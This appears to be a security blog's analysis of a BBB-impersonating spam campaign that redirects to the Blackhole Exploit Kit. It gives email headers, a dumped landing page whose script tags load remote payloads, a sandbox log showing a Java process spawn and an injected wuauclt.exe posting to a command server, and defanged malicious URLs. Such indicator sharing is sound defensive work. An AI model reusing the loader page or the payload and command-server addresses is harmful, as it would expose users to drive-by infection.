We have received various spam emails that simulate messages from Better Business Bureau (BBB), but in real are used to spread malicious links that leads to Blackhole Exploit Kit. The subject of the emails looks like this:
Your updated information is necessary |
A screenshot of the email:
Other details of the emails:
Return-Path: <top-team3@ms16.hinet.net> Received: from msr6.hinet.net (msr6.hinet.net [168.95.4.106]) Received: from ms16.hinet.net ([178.206.55.126]) Date: Thu, 26 Jan 2012 22:49:15 +1000 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1 Subject: Your updated information is necessary |
The link present in the email:
hxxp://app.alaskaoregonwe sternwashington.bbb.org/sbq |
Redirects users to the malicious link:
hxxp://circutor .com/4ethe8ep/index.html |
The dumped content of the malicious link is:
<html> <h1>WAIT PLEASE</h1> <h3>Loading...</h3> <script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script> <script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script> <script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script> </html> |
Extracted malicious links (active as of now) that lead to Blackhole Exploit Kit are:
hxxp://diamondservice.com .au/B0bifDVW/js.js hxxp://www.rentacandle.com .au/4SvXUuz4/js.js |
We have analyzed the malicious link with our sandbox, and this is the report:
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 213.229.188.210 - 80 Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 203.210.112.33 - 80 Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\8YPELNXD\js[1].js - 7A6BC5BCB465D4C54CA3D185FD5D45F0 - 75 bytes - attr: [] - - Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 50.116.33.235 - 80 Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1 File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\VBPHH91D\search[1].htm - D2EE09D5DBE3B22B66CFF67B81999E55 - 2048 bytes - attr: [] - - Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 65.55.13.243 - 80 Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache\N6MCDZF7 File Modified - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\LOCALS~1\Temp\java_install_reg.log File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %Temp%\hsperfdata_%UserName%\856 - NOTHING TO HASH - 0 bytes - attr: [] - - File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Sun\Java\Deployment\deployment.properties - 2EDE01E8DF28D3DC2BF961089BC9A241 - 635 bytes - attr: [] - - Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 64.4.52.169 - 80 Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - codecs.microsoft .com - /isapi/ocget.dll File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\hsperfdata_%UserName%\2016 - NOTHING TO HASH - 0 bytes - attr: [] - - File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\java_install_reg.log File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [] - - File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [-normal] - - Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java\Deployment Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\log Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\security Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\ext Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\tmp File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\deployment.properties - NOTHING TO HASH - 0 bytes - attr: [] - - Process Created - C:\WINDOWS\explorer.exe - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - Microsoft Corporation - 55794B97A7FAABD2910873C85274F409 - 93184 bytes File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat File Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat - C9508CA14563A81666441FF191D9BB24 - 664 bytes - attr: [] - - Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012010920120116\ File Deleted - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\index.dat - 32768 bytes Directory Removed - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\ Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012012820120129\ Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53 Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80 Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php Process Created - C:\WINDOWS\explorer.exe - C:\WINDOWS\system32\verclsid.exe - Microsoft Corporation - 91790D6749EBED90E2C40479C0A91879 - 28672 bytes Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects\FMGLCCCK Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx - NOTHING TO HASH - 0 bytes - attr: [] - - Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\G55SBTS1\field[1].swf - 2435793EE73EFDAF79541977B3C08EEB - 1490 bytes - attr: [] - - Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 5152 Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 1079 Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.12.249 - 80 Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.206.209 - 80 Web Request - C:\WINDOWS\explorer.exe - GET - home.microsoft .com - / Connection Established - C:\WINDOWS\explorer.exe - TCP - 94.245.115.205 - 80 Connection Established - %ProgramFiles%\Java\jre6\bin\java.exe - TCP - 50.116.33.235 - 80 |
Malicious urls extracted:
diamondservice .com.au - /B0bifDVW/js.js matorbaron .com - /search.php?page=ac2393a35636dfa1 kosmovodki .ru - /statnl/image.php matorbaron .com - /content/field.swf |
As we can see, malicious code is injected in the system process wuauclt.exe:
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53 Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80 Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php |
Blackhole exploit kit requests:
matorbaron .com - /search.php?page=ac2393a35636dfa1 matorbaron .com - /content/field.swf |
Download dumped network traffic (password is urlvoid.com):